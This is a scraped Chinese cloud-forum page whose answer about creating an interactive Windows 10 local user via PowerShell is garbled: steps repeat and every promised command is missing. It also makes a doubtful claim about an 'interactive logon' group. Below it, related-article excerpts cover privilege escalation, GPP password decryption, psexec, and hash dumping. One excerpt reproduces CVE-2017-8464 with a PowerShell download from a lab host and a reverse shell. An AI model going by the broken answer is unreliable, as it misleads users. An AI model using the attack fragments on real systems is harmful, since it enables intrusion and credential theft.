通过PowerShell创建Windows 10本地用户-如何使其具有交互性？

通过PowerShell创建Windows 10本地用户并使其具有交互性，可以按照以下步骤进行操作：

打开PowerShell：在Windows 10中，按下Win + X键，然后选择“Windows PowerShell（管理员）”。
创建本地用户：在PowerShell中，使用以下命令创建本地用户：
创建本地用户：在PowerShell中，使用以下命令创建本地用户：
将“用户名”替换为要创建的用户名，将“密码”替换为用户的密码。
使用户具有交互性：默认情况下，通过PowerShell创建的本地用户没有交互性。要使其具有交互性，需要进行以下步骤：
a. 在PowerShell中，使用以下命令获取用户的SID（Security Identifier）：
a. 在PowerShell中，使用以下命令获取用户的SID（Security Identifier）：
b. 使用以下命令将用户添加到“交互式登录”用户组：
b. 使用以下命令将用户添加到“交互式登录”用户组：
现在，通过PowerShell创建的本地用户将具有交互性。

创建本地用户的优势是可以在Windows 10操作系统中管理和控制用户访问权限，适用于个人电脑、家庭办公室或小型组织。以下是一些应用场景：

家庭共享电脑：可以为每个家庭成员创建独立的本地用户，以保护个人隐私和文件安全。
小型组织：可以为每个员工创建独立的本地用户，以管理和控制他们的访问权限。
临时用户：可以创建临时本地用户，以便临时授权给访客或临时工访问计算机。

腾讯云提供了一系列云计算产品，其中包括云服务器、云数据库、云存储等。您可以访问腾讯云官方网站（https://cloud.tencent.com/）了解更多关于这些产品的详细信息和使用指南。

相关·内容

如何在 Windows 10 中移除 Internet Explorer 浏览器如何通过控制面板删除 Internet Explorer 浏览器通过 PowerShell 删

现在 Internet Explorer （IE）已经过时了，可以通过控制面板移除这个古老但是依然是一个伟大的浏览器现在默认在 Windows 10 的浏览器是 Edge 虽然这个浏览器已经修改为 Chromium...内核，但是 Windows 10 依然保留 Internet Explorer 11 为了兼容之前的网站。...如果觉得自己的磁盘空间不足，可以尝试卸载 IE 浏览器，卸载的方法有两个，一个是通过控制面板，另一个是通过 PowerShell 脚本如何通过控制面板删除 Internet Explorer 浏览器...，在控制面板点击开启功能这时可以找到 IE 的选项，取消勾选，点击确定这时会提示是否确定删除，点击确定，然后重启设备这样就可以从设备移除 Internet Explorer 浏览器通过 PowerShell...删除 Internet Explorer 浏览器右击开始菜单，选择 PowerShell 脚本，使用管理员权限运行输入下面代码，可以先复制下面代码，在 PowerShell 右击粘贴 Disable-WindowsOptionalFeature

1.8K1 0

Windows：管理用户账户，密码策略和安全配置

本文将探讨如何通过PowerShell和其他Windows工具管理用户账户，包括查看和设置密码策略、检查用户状态，以及导出和导入安全策略。...这可以通过Active Directory的PowerShell模块实现，使用Get-ADFineGrainedPasswordPolicy和New-ADFineGrainedPasswordPolicy...cmdlets 来查看和创建策略。...检查本地用户的状态使用PowerShell的Get-LocalUser命令，管理员可以查看本地用户的状态，包括账户是否启用、是否过期等信息。...例如，通过以下命令获取详细信息并以JSON格式输出： powershell Get-LocalUser | ConvertTo-Json 这为管理员提供了一种灵活的方式来监控和报告系统中用户账户的状态

1.8K2 0

内网渗透基石篇--权限提升

通过at命令发布的定时任务计划，Windows默认以System权限运行。...1.常见的组策略首选项：映射驱动器创建本地用户 数据源打印机配置创建/更新服务计划任务 2 组策略首选项提取分析 1.创建组策略，批量修改域中机器的本地管理员密码 ?...4.使用Empire查找cpassword 命令：usemodule privesc/gpp 实验:gpp组策略搭建让我们看一个例子，说明通过组策略定义本地用户登录。...用户配置—-控制面板设置—-本地用户和组—新建-本地用户中添加一个脚本登录。 ? ? 可以看到域控制器行创建了本地组策略的文件： ?...XMl文件从SYSVOl目录中删除 3.不要把密码放在所有域用户都有权访问的文件中 4.如果需要更改域中机器的本地管理员密码，建议使用LAPs 总结：本文主要从内网权限提升出发，主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限

1.7K6 0

psexec工具的使用

psexec.exe依赖于admin共享，而impacket下的psexec.py则依赖于admin或c psexec的基本原理是：通过管道在远程目标机器上创建一个psexec服务，并在本地磁盘中生成一个名为...然后，通过psexec服务运行命令，运行结束后删除服务。在使用psexec执行远程命令时，会在目标系统中创建一个psexec服务。命令执行后，psexec服务将会被自动删除。...由于创建或删除服务时会产生大量的日志，所以会在攻击溯源时通过日志反推攻击流程。.../smb/psexec_psh ：该模块生成的payload主要是由powershell实现的显然powershell生成的payload免杀效果比exe的要好，但是windows xp、server2003...默认不包含powershell环境。

9.2K2 0

『权限提升系列』- 组策略首选项提权

组策略的发展域环境下密码难题在Windows server 2003中，想要批量修改域内主机本地管理员密码，常常通过配置组策略执行vbs脚本的方式，贴三好学生大佬的代码： strComputer =...其中GPP最有用的特性，是在某些场景存储和使用凭据，其中包括：映射驱动（Drives.xml）创建本地用户数据源（DataSources.xml）打印机配置（Printers.xml）创建/更新服务（...右击组策略–>新建: 右击test(刚刚创建好的组策略对象)–>编辑,来到如下位置：右击本地用户和组–>新建–>本地用户：操作–>更新其中设置的密码为hacker*****34，记住！...The 32-byte AES key is as follows: 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc...检索通过组策略首选项推送的帐户的明文密码和其他信息。

4.6K1 0

CVE-2017-8464远程命令执行漏洞（震网漏洞）复现

2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统...当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器（或远程共享）时，恶意二进制程序将在目标系统上执行攻击者选择的代码，成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限...1607 for x64-based Systems Microsoft Windows 10 for 32-bit Systems Microsoft Windows 10 for x64-based...Windows Server 2012 Microsoft Windows Server 2012 R2 Microsoft Windows Server 2016 漏洞复现: 利用原理：创建恶意快捷方式...('http://10.0.0.140/search.ps1');test.ps1" 7.名称为:powershell.exe 8.kali下创建监听反弹，并且可以看到成功反弹出靶机的shell: use

9202 0

Windows手工入侵排查思路

检查隐藏账号方法： CMD命令行使用”net user”,看不到”test$”这个账号，但在控制面板和本地用户和组是可以显示此用户的。检查克隆账号方法：打开注册表，查看管理员对应键值。...可以通过观察以下内容：没有签名验证信息的进程没有描述信息的进程进程的属主进程的路径是否合法 CPU或内存资源占用长时间过高的进程（2）如何找到进程对应的程序位置...d、回收站、浏览器下载目录、浏览器历史记录 e、修改时间在创建时间之前的为可疑文件（2）发现一个WEBSHELL或远控木马的创建时间，如何找出同一时间范围内创建的文件？...08、检查系统日志（1）检查系统安全日志一般来说，可以通过检查Windows安全日志来获悉账号登录情况，比如成功/失败的次数。...（2）历史命令记录高版本Powershell会记录PowerShell的命令，所有的PowerShell命令将会保存在固定位置： %appdata%\Microsoft\Windows\PowerShell

1.6K3 0

Windows 提权

服务漏洞进行提权(也是PowerShell Empire和PowerSploit的一部分) powershell -exec bypass -command "&{Import-Module ....、域信任用户具有读权限的活动目录的的域范围内共享，所有的域策略都存放在C:\Windows\SYSVOL\domain\Policies\目录中。...通过组策略修改密码，若攻击者获得一台机器的本地管理员密码，就相当于获取整个域中所有机器的本地管理员密码 GPP最有用的特征，是在某些场景存储和使用凭据，包括以下: 映射驱动（Drives.xml）创建本地用户数据源...创建组策略 gpmc.msc进入组策略管理计算机配置->首选项->控制面板设置->本地用户和组,新建一个本地用户 将域中每个计算机本地的Administrator用户名改为test_hacker,...powershell脚本(https://github.com/shanfenglan/test/blob/master/juicypotato/clsid.ps1)来查找可用的CLSID powershell

1.8K9 0

如何获取TrustedInstaller权限

(例如本地用户直接登录、远程桌面登录) Impersonation token(模拟令牌):用于非交互登录(利用net use访问共享文件夹) 注：两种token只在系统重启后清除具有Delegation...接着，我们以管理员身份运行 Powershell，然后输入（其中 C:\token，为我们刚刚新建文件夹的路径）： Save-Module-NameNtObjectManager-Pathc:\token...结束后，我们需要让系统允许使用 Powershell 脚本，我们输入： Set-ExecutionPolicyUnrestricted 并回车。...接下来系统会打开一个命令提示符，该命令提示符就具有 Trustedinstaller 权限，可以直接修改系统文件。...我们可以通过： whoami/groups/folist 进行测试关闭CMD后重新打开需要重新获取TrustedInstaller权限输入： sc.exestartTrustedInstallerSet-NtTokenPrivilegeSeDebugPrivilege

6.8K5 0

内网渗透 | 浅谈域渗透中的组策略及gpp运用

通过使用组策略，你可以设置策略设置一次，然后将该设置复制到多台计算机上。...其中GPP最有用的特性，是在某些场景存储和使用凭据，其中包括：映射驱动（Drives.xml）创建本地用户 数据源（DataSources.xml）打印机配置（Printers.xml）创建/更新服务...GPP 我们可以看到GPP里面自定义了很多操作，比如本地用户和组的密码控制、计划任务等在GPP出现之前，很多统一管理的操作只能通过脚本来实现，而GPP方便和简化了这样的管理,GPP你可以将其理解为一个功能点...下面我们演示如何在域中根据该用户名称来进行针对性的GPP搜索简单的信息收集: 1.查看域内共享 powershell get-domaincomputer|get-netshare ?...这里演示下如何使用New-GPOImmediateTask.ps1 1.导入powershell中管理GPO的模块&创建一个作用整个域的GPO Import-Module GroupPolicy –verbose

2.8K2 0

浅谈域渗透中的组策略及gpp运用

通过使用组策略，你可以设置策略设置一次，然后将该设置复制到多台计算机上。...其中GPP最有用的特性，是在某些场景存储和使用凭据，其中包括：映射驱动（Drives.xml）创建本地用户 数据源（DataSources.xml）打印机配置（Printers.xml）...不难看到这个GPO作用的范围是DC这个OU,相应的执行优先级如下图 GPP 我们可以看到GPP里面自定义了很多操作，比如本地用户和组的密码控制、计划任务等在GPP出现之前，很多统一管理的操作只能通过脚本来实现...通过GPO我们可以指定控制OU下的所有用户，比如批量下发木马或者进行其他操作。...这里演示下如何使用New-GPOIm/images/浅谈域渗透中的组策略及gpp运用teTask.ps1 1.导入powershell中管理GPO的模块&创建一个作用整个域的GPO Import-Module

1.6K1 0

内网渗透-导出HASH的多种方式

在Windows操作系统上，sam数据库（C:\Windows\System32\config\sam）里保存着本地用户的hash。...注意：在windows 10\ 2012r2之后的系统版本中，默认情况下已禁用在内存缓存中存系统用户明文密码，此时再直接使用mimikatz去抓明文，肯定是抓不到的。密码字段位会直接显示为null。...-10/ 优先级区别：PP 可以以完全访问权限打开 PP 或 PPL，只要其签名者级别大于或等于；一个 PPL 可以打开另一个具有完全访问权限的 PPL，只要其签名者级别大于或等于；无论签名者级别如何，...应用程序可以非常快速有效地创建小型转储文件。由于小型转储文件很小，因此可以轻松地将其通过Internet发送给该应用程序的技术支持。 full dump：全部的转储文件。...通过生成现有的ntds.dit文件快照，来导出ntds.dit文件。 Powershell -ExecutionPolicy Bypass Import-Module .

1961 0

从上而下的死亡：从 Azure 到 On-Prem AD 的横向移动

模块通过 PowerShell 轻松枚举这些设备。...单击“添加”，然后单击“Windows 10：” image.png 这将带您进入“添加 Powershell 脚本”页面。在第一页上，您将输入脚本的名称和简要说明。...有两个租户级角色具有将 PowerShell 脚本添加到 Endpoint Manager 的明确能力：“全局管理员”和“Intune 管理员”。...脚本时，会在端点上创建许多工件——一些是永久性的，一些是短暂的。...在以下位置执行 PowerShell 脚本时，会在端点上创建两个文件： C:\Program 文件 (x86)\Microsoft Intune 管理扩展\Policies\Scripts C:\Program

2.5K1 0

【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令

1041 0

Windows 系统信息收集姿势

# 查看 powershell 历史操作记录 type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt...主要利用工具有：setspn、GetUserSPNs.vbs和Rubeus。...本地用户无法执行域命令查询域内容。...2、dsquery dsquery 命令很少使用，而且限制较大仅能在域控上执行，所以相对而言较为鸡肋，但是在一定条件下还是具有一定的使用价值。...UltraVNC\ultravnc.ini passwd or passwd2 五、总结本文主要总结了在拿到服务器权限之后信息收集的主要命令和工具，对于没有相关经验的人来说看上去是懵逼状态，对于收集的信息如何使用

2.9K2 1

CS学习笔记 | 15、枚举的命令和方法

4、本地用户 本地用户Local User就是系统上的一个标准用户。当我们想在 Windows 命令行下指定一个本地的用户时，可以通过输入 ....\本地用户名或者计算机名\本地用户名来指定本地的用户账户，其中.表示计算机名。...192.168.15.124 PS C:\> ping -n 1 -4 WIN-P2AASSD1AF1 正在 Ping WIN-P2AASSD1AF1.teamssix.com [192.168.15.124] 具有...PowerView 是由 Will Schroeder 开发的 PowerShell 脚本，该脚本完全依赖于 Powershell 和 VMI ，使用 PowerView 可以更好的收集内网中的信息，在使用之前...0X03 Net 模块 Cobalt Strike 中有自己的 net 模块，net 模块是 beacon 后渗透攻击模块，它通过 windows 的网络管理 api 函数来执行命令，想使用 net 命令

7503 0

PowerShell系列（三）：PowerShell发展历程梳理

624条● 远程执行功能：可以通过主控计算机管控运行各个服务器的运行程序和结果。... 5.0● 发行日期：2016/2● 默认集成版本：Windows Server 2016技术预览版、Windows10● 支持其他版本：Windows Server 2012 R2 、Windows...id=54616版本特性● 新增了本地用户管理模块● 5.1之后版本划分为桌面版和Core版本7、PowerShell6.0 Core● 发行日期：2018年1月● 默认集成版本：Windows Server...2019版本当中● 支持其他版本：Windows 7、Windows 8.1、Windows 10、Windows Server 2008 R2、Windows Server 2012 R2、Windows... Core● 发行日期：2020年3月● 默认集成版本：Windows Server 2019版本当中● 支持其他版本：Windows 7、Windows 8.1、Windows 10、Windows

3944 1

PS命令之操作系统远程管理及进程服务操作示例

描述: 该cmdlet将计算机配置为接收通过使用WS-Management技术发送的PowerShell远程命令。...# 已配置 LocalAccountTokenFilterPolicy 以远程向本地用户授予管理权限。...# 2.如何在Windows操作系统的客户端版本上允许从公共网络进行远程访问,对于不同版本的Windows，防火墙规则的名称可能不同; # NetSecurity模块中的Set-NetFirewallRulecmdlet...# 示例5：具有禁用的会话端点配置的环回连接 Disable-PSRemoting -Force # 第一次会话创建尝试: 凭据通过Credential参数显式传递给命令, 这种类型的连接通过网络堆栈....6 Available # 示例6：阻止对具有自定义安全描述符的会话配置的远程访问 # Register-PSSessionConfiguration创建测试会话配置, 该文件路径参数指定自定义会话的会话配置文件

7.3K4 0

“震网三代”（CVE-2017-8464）的几种利用方法与防范

早在6月13日，微软发布补丁修复编号为CVE-2017-8464的漏洞，本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式，并通过可移动设备或者远程共享的方式导致远程代码执行，追溯到以前，NSA就承认利用过相似漏洞且以...CVE-2017-8464漏洞影响版本： Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server...*2）PowerShell 这个使用Powershell的方法并非先前网络上流传的CVE-2017-8464复现方法。...首先下载Export-LNKPwn.ps1 注意： -需要4.0或以上.NET库版本，作者使用了一些只有PowerShell 5.0才有的构造函数（如new()），他打算将版本要求降低到....NET 3.5 和PowerShell 2.0，这样的话模块在所有目标环境中都能被载入内存。

2.1K4 0

PBG：一款功能强大的PowerShell后门生成工具

值得一提的是，该工具可以为类似Flipper Zero和Hak5 USB Rubber Ducky这样的热门黑客设备创建有效的Payload，而且广大研究人员也可以使用该工具来测试目标系统针对高级攻击技术的防御能力...Rubber Ducky Payload生成； 2、Flipper Zero Payload生成； 3、从远程系统下载文件； 4、从URL播放wav文件； 5、获取目标计算机的公共IP地址； 6、枚举本地用户...； 7、查看有价值的文件； 8、收集有关目标系统操作系统的信息； 9、从目标系统检索BIOS信息； 10、检查是否安装了防病毒软件及其当前状态； 11、获取活动TCP客户端； 12、安装Chocolatey...Payload执行的延迟毫秒数，默认为100 --flipper FLIPPER Flipper Zero Payload文件名 --ducky 为HTTP服务器创建一个.../backdoor.ps1 (向右滑动，查看更多) 该功能已在Windows 11、Windows 10和Kali Linux上进行过测试。

1K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云